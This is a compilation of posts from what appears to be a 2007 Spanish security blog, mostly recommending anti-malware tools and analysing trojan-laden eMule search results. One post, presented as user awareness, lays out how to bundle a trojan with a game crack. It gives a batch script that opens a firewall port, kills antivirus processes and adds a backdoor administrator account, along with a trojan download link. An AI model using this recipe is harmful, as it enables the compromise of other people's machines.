los procesos mínimos de inicio, de forma que las técnicas de la mayoría de los virus para cargarse al inicio de Windows no funcionan. Des esta forma a MSNCleaner le será mas fácil borrar el malware. Es una herramienta gratuita, que necesita registro en la página de InfoSpyware para poder descargarla. Más información y descarga de MSNCleaner: http://www.forospyware.com/t92153.html Regístrate en InfoSpyware: http://www.forospyware.com/register.php?do=signup Seguridad en conversaciones de Messenger: http://vtroger.blogspot.com/cifrar-conversaciones-de-mensajera.html Uso seguro de Messenger: http://vtroger.blogspot.com/uso-seguro-de-mensajera-instantnea.html

Eliminar troyanos en línea de comandos.
Es muy fácil utilizando la herramienta a-squared, es muy potente y completa. Posee la posibilidad de actualizar su base de datos y consume muy pocos recursos. Es ideal para maquinas obsoletas que aun trabajen en Windows 98 o ME. Esta versión del popular anti-malware asquared es totalmente gratuita y funciona en las plataformas: Windows 98, ME, 2000, XP, 2003 Server y Vista. También se puede hacer un excelente uso de esta aplicación en un cd de arranque de recuperación del sistema, para limpiar el sistema sin tener los archivos infectados cargados en memoria. Más información y descarga de a-squared en línea de comandos en: http://www.emsisoft.es/es/software/download/ Antivirus línea de comandos: http://vtroger.blogspot.com/2007/07/antivirus-ideal-para-ordenadores-con.html Detectar Malware desde DOS: http://vtroger.blogspot.com/2007/04/detectar-malware-desde-dos.html

Prácticas malware en emule II.
En un anterior post analizaba los resultados de una búsqueda en emule, de una cadena de palabras sin significado para simular una búsqueda con pocas fuentes. El resultado eran tres archivos generados con esa sentencia, estés archivos poseían malware y uno de ellos un troyano. La aparición de estés resultados en las búsquedas es fruto de servidores comprometidos o simplemente creados para este fin. Eses resultados actualmente han sufrido una alteración que merece la pena reflexionar sobre ella y analizar, comparemos resultados: Este ejemplo con la cadena de palabras “qwery” realizado el 15 de mayo del 2007, daba tres resultados: Qwery fastest BitTorrent download.zip

Find qwery using emule multimedia toolbar.zip Watch Live TV and Find qwery usin TVtoolbar.zip Realizando esta misma prueba el 11 de junio de 2007 se obtenían los siguientes resultados: Download qwery with the fastest BitTorrent downloader.zip Find qwery using emule multimedia toolbar.zip View qwery with the ultimate player.zip Hoy 13 de noviembre de 2007 obtengo los siguientes resultados: qwery v1.4.7.3 Cracked.rar qwery Wallpapers.exe qwery Multilanguage.exe qwery No serial(crack).zip qwery Crack(osloskop.net).exe qwery Crack.rar qwery Keygen.exe qwery Genuine.Advantage.Validation.rar qwery Single player.rar qwery Serial CDs.exe qwery Reloaded.exe qwery Genuine Licence.rar qwery Soundtrack.exe qwery No-Dvd fixes.rar qwery Plug-In.exe A simple vista hay un cambio significativo, más resultados y muy bien hechos para engañar, en el caso de buscar un crack para una aplicación seria muy fácil caer en la trampa. Los archivos *.rar la mayoría son programas espías sin mucho peligro para nuestro sistema como en los anteriores análisis. En el caso de los archivos *.exe son troyanos pero con una peculiaridad muy interesante, no solo convierten nuestro sistema en zombie, también se dedican a instalar programas espías e infectar otros sistemas mediante correo electrónico o generando archivos compartidos para emule. Siempre hay que estar muy seguros de las fuentes de donde sacamos el software en este caso, en el emule es imposible. Un antivirus no es la solución final contra el malware y los virus, se necesitan protecciones adicionales como firewall, programas antiespias, programas antirootkit y una concienciación del usuario en materia de seguridad informática (esto en un usuario común consta de algunos conocimientos y sentido común). Practicas malware en Emule I. http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html Ordenadores zombies. http://vtroger.blogspot.com/2006/02/virus-zombis.html Técnicas Malware: Falsos programas de seguridad informática. http://vtroger.blogspot.com/2007/06/tcnicas-malware-falsos-programas-de.html

Tecnología Sandbox, lo ultimo contra el malware.
Esta tecnología consiste en crear un escenario virtual entre el sistema y una aplicación como por ejemplo en el caso más habitual de los escenarios de infección de malware, entre el navegador y el sistema operativo. Este escenario virtual denominado Sandbox es una maquina virtual con un sistema operativo. Esta maquina virtual utiliza prestaciones ROM BIOS, hardware simulado, unidades de disco duro simuladas... El SandBox emula la secuencia completa de arranque de un sistema normal cargando los archivos del sistema operativo y la estructura de comandos desde la unidad virtual. Esta unidad contendrá los directorios y archivos necesarios del sistema, ajustando los archivos del sistema virtual a la de las unidades de disco físicas. Cuando navegamos usando un entorno SandBox entre nuestro sistema y nuestro navegador los cambios que las aplicaciones malware harían en el sistema operativo, se efectuarían en el SandBox. Además de impedir que los cambios se ejecuten en nuestro sistema, las acciones de las aplicaciones sospechosas en ese entorno simulado permiten a la aplicación anti-malware saber que aplicación seria potencialmente peligrosa. Aquí dejo enlaces de aplicaciones que utilizan esta técnica. Más información y descarga Sandboxie: http://www.sandboxie.com/ Más información y descarga SafeSpace 1.1.96.0 Beta: http://www.artificialdynamics.com/content/products/personal-edition.aspx Mas información y descarga Norman Antivirus http://www.norman.com/es

Como obtener información de los procesos que corren en Windows.
En este post no voy a hablar de programas para monitorizar procesos, sino de páginas Web en las que podemos obtener información muy valiosa de los procesos que corren en nuestro sistema. En estas paginas hay información sobre procesos y sobre las aplicaciones de las que forman parte: si son programas espías, virus, troyanos, componentes de Windows… Esta información nos puede ayudar a mejorar la seguridad de nuestros sistemas Windows. ProcessLibrary.com (Ingles): http://www.processlibrary.com/ WinTasks Process Library (Ingles): http://www.liutilities.com/products/wintaskspro/processlibrary/ ProcessID (Ingles): http://www.processid.com/processes.html Startup Application Knowledge Base (Ingles): http://www.windowsstartup.com/wso/browse.php

Yoreparo (Castellano): http://www.yoreparo.com/procesos/

Técnicas Malware: Falsos programas de seguridad informática.
Una técnica Malware que se esta extendiendo mucho últimamente, son los falsos programas de seguridad informática, que te recomiendan que instales en anuncios de algunas webs. Estés programas de seguridad se anuncian como anti-spyware, pero lo que hacen es infectar tu sistema con malware, además aunque tu sistema este limpio estés programas siempre dan falsos positivos para justificar su uso. Normalmente estos programas tienen otra característica añadida y es que son difíciles de desinstalar del sistema operativo. Mi consejo es siempre, no instalar ningún software sin asegurarse de que se puede confiar en el proveedor, o en la fuente de donde se descarga. En el caso de que se tenga instalado uno de esos programas, o se desconfié de algún software instalado en el sistema, puede buscar en la lista de webs y falsos programas de seguridad de spywarewarrior. Si tiene conocimientos avanzados puede monitorizar la aplicación sospechosa, con una herramienta muy practica para monitorizar procesos, se trata de RunAlyzer de los creadores de una de las mejores herramientas contra malware, Spybot-S&D. En el caso de que quiera desinstalar la aplicación sospechosa de malware, le recomiendo para ello la herramienta MyUninstaller, con muchísimas más opciones que el complemento agregar o quitar programas de Windows. Y para borrar los restos de la aplicación manualmente la herramienta FileASSASSIN. Mas información y descarga RunAlyzer: http://www.safer-networking.org/es/runalyzer/index.html Más información y descarga MyUninstaller: http://www.nirsoft.net/utils/myuninst.html Borrar archivos bloqueados por Windows con FileASSASSIN: http://vtroger.blogspot.com/2007/03/borrar-archivos-bloqueados-por-windows.html Lista de programas y webs falsos de seguridad informática en spywarewarrior: http://www.spywarewarrior.com/rogue_anti-spyware.htm Practicas malware en Emule: http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html

Practicas malware en Emule.
Cuando buscamos en Emule algún archivo que no tiene muchas fuentes en algunos servidores se generan respuestas automáticas con tres archivos, infectados con malware. Un ejemplo es cuando buscamos la palabra “qwery”: Este ejemplo realizado el 15 de mayo del 2007 daba tres resultados: Qwery fastest BitTorrent download.zip

Find qwery using emule multimedia toolbar.zip Watch Live TV and Find qwery usin TVtoolbar.zip Analizando estes archivos con Virustotal obtengo los siguientes resultados: “Qwery fastest BitTorrent download.zip”, 16 motores antivirus detectan este archivo como infectado por un troyano. “Find qwery using emule multimedia.zip” y “Watch Live TV and Find qwery usin.zip” no son detectados por ningún motor antivirus. Realizando esta misma prueba hoy 11 de junio de 2007 obtengo los siguientes resultados: Download qwery with the fastest BitTorrent downloader.zip Find qwery using emule multimedia toolbar.zip View qwery with the ultimate player.zip Analizando estés archivos con Virustotal obtengo los siguientes resultados: “Download qwery with the fastest BitTorrent downloader.zip”, 11 motores antivirus lo reconocen como un troyano. “Find qwery using emule multimedia toolbar.zip”, ningún motor antivirus lo reconoce como infectado. “View qwery with the ultimate player.zip”, 9 motores antivirus lo reconocen como infectado. Conclusiones de los análisis: El archivo “Qwery fastest BitTorrent download.zip” ha cambiado de nombre a “Download qwery with the fastest BitTorrent downloader.zip” pero sigue conteniendo el mismo virus, le han aplicado técnicas de morphing, para engañar el sistema de reconocimiento de firmas de los motores antivirus por eso ha pasado de ser reconocido por 16 motores a 11 motores antivirus. “Find qwery using emule multimedia toolbar.zip”, sigue sin ser reconocido por ningún motor antivirus pero es una barra multimedia con comportamiento de malware, recaba información de hábitos de navegación para después enviarlos a la red. “View qwery with the ultimate player.zip”, en otro troyano al que también se le han aplicado técnicas de morphing, para engañar a los motores antivirus solo 9 motores lo reconocen. “Watch Live TV and Find qwery usin TVtoolbar.zip”, ya no aparece como resultado, aunque ningún antivirus lo reconoce es una barra para el navegador, con un comportamiento malware, también sirve para averiguar nuestros hábitos de navegación. Conclusiones finales.

Siempre hay que estar muy seguros de las fuentes de donde sacamos el software en este caso, en el emule es imposible. Un antivirus no es la solución final contra el malware y los virus, se necesitan protecciones adicionales como firewall, programas antiespias y programas antirootkit.

Post relacionados anteriormente publicados: Infectar un sistema fácilmente con un troyano. http://vtroger.blogspot.com/2006/08/infectar-un-sistema-fcilmente-con-un.html Forma común de recibir un troyano. http://vtroger.blogspot.com/2005/10/forma-comn-de-recibir-un-troyano.html Antivirus, ¿Cuánto más caro mejor? http://vtroger.blogspot.com/2005/10/antivirus-cunto-ms-caro-mejor.html 10 consejos de seguridad para un usuario. http://vtroger.blogspot.com/2005/10/10-consejos-de-seguridad-para-un.html Ordenadores zombies. http://vtroger.blogspot.com/2006/02/virus-zombis.html Acerca de Virustotal. http://vtroger.blogspot.com/2006/05/servicio-gratuito-de-anlisis-antivirus.html

Detectar Malware desde DOS.

Con Bughunter una aplicación muy potente a la par que sencilla, que permite detectar malware desde cualquier PC que tenga un entorno DOS. Al funcionar en un entorno DOS la convierte en una aplicación rápida y que consume pocos recursos. Ideal para guardar en disco de arranque o para detectar malware en maquinas con sistemas obsoletos. Más información y descarga: http://bughunter.it-mate.co.uk/

Herramienta para identificar procesos sospechosos en Windows:

Con CurrPorts podemos obtener una lista de los procesos que tienen puertos TCP/UDP abiertos. Para cada puerto se muestra en la lista información sobre el proceso que abrió el puerto, incluyendo la trayectoria conocida, la ruta del proceso, información de la versión del proceso (nombre del producto, descripción del archivo…), cuando se cargo el proceso y el usuario que lo creó. CurrPorts marca el con color rosado los procesos sospechosos y permite matarlos. Esta herramienta es muy buena para detectar malware que infecta nuestra sistema, sobre todo si la combinamos con Filemon podemos estudiar el comportamiento de procesos sospechosos. Información y descarga CurrPorts: http://www.nirsoft.net/utils/cports.html Filemon: http://vtroger.blogspot.com/2005/11/monitorear-procesos.html

Infectar un sistema fácilmente con un troyano.
Este post no es para fomentar la piratería, es un ejemplo de lo importante que es ejecutar archivos que no sabemos de donde proceden. Pasos para preparar la infección para Windows XP SP2: 1º Buscamos un troyano, son fáciles de encontrar, google es nuestro mejor aliado. En este caso e usado uno muy sencillo y eficaz Cabronator 3. 2º Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecución. 3º Un cebo, un crack de algún juego que este de moda. Este crack será lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano. 4º Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus. Ejemplo: :Esta linea abre el puerto del troyano en el firewall de windows Xp netsh firewall set portopenig tcp 5555 tcp5555 enable :Estas lineas desactivan el antivirus Avast! taskkill /f /im ashserv.exe taskkill /f /im ashdisp.exe taskkill /f /im ashmaisv.exe net stop avast! Antivirus net stop avast! iAVS4 Control Service net stop avast! Mail Scanner net stop avast! Web Scanner

:Estas el Panda taskkill /f /im APVXDWIN.EXE net stop Panda anti-virus service :Estas crean el usuario Alvaro con contraseña hola y le da privilegios net user Alvaro hola /add net localgroup administradores Alvaro /add 5º Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego. 6º Solo nos queda un medio de difusión: e-mail, emule … Este es un modelo de infección muy básico, aunque el joiner oculte el troyano cuando se descomprima el antivirus lo detectaría, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volverá activar y encontrara el virus. Este post es para explicar porque no se deben ejecutar archivos adjuntos de correos electrónicos de fuentes desconocidas o archivos ejecutables descargados de sitios que no son de confianza. Cactus Joiner 2.0 http://foro.elhacker.net/index.php/topic=131276.0.html Troyano Cabronator 3 información: http://www.perantivirus.com/sosvirus/virufamo/cabronat.htm Troyano Cabronator 3 descarga: http://kakoweb.iespana.es/kakoweb/files/CaBrONaToR3KiLL.zip

Sencilla herramienta para controlar el malware.
Se trata de Winpatrol una herramienta de seguridad para Windows, muy sencilla que permite controlar los procesos y servicios que corren en el sistema, para prevenirlo de códigos maliciosos como programas espías, troyanos… Winpatrol te informa de los programas y servicios con detalles e información sobre ellos y opciones de configuración. También avisa de los cambios que los programas hacen en las partes sensibles del sistema y ofrece a la vez, la opción de bloquear dichos cambios (una opción que ayuda a detectar troyano o virus desconocidos por los antivirus). Además con Winpatrol se puede: evitar que te cambien la página de inicio, filtrar cookies y evitar add-ons no deseadas del Internet Explorer. Mas información y descarga: http://www.winpatrol.com

Monitorear procesos.
En más de una ocasión he tenido problemas a la hora de instalar aplicaciones y después usarlas en usuarios sin privilegios, la aplicación me daba errores sin especificar y Windows no informa mucho sobre las características de los procesos. La mayoría de estés errores están relacionados con permisos de carpetas y claves de registro. Para solucionar estés problemas yo les recomiendo unas herramientas gratuitas muy útiles, como son: Filemon para monitorizar procesos e indicarnos las acciones de dichos procesos, Regmon monitoriza entradas y uso del registro por parte de los procesos y Diskmon nos indica el uso del disco. Utilice estas herramientas cuando una aplicación falle, incluso puede filtrar el monitoreo. Ejemplo: Si un programa le da un error desconocido y no se instala ponga estos monitores a funcionar y vuelva arrancar la instalación, en el momento del fallo párelos y vera como obtiene mas información del fallo. También es muy útil para detectar procesos sospechosos como troyanos o virus. Más información y descarga en: http://www.sysinternals.com/FileAndDiskUtilities.html

Sponsor Documents

Or use your account on DocShare.tips

Hide

Forgot your password?

Or register your new account on DocShare.tips

Hide

Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in

Close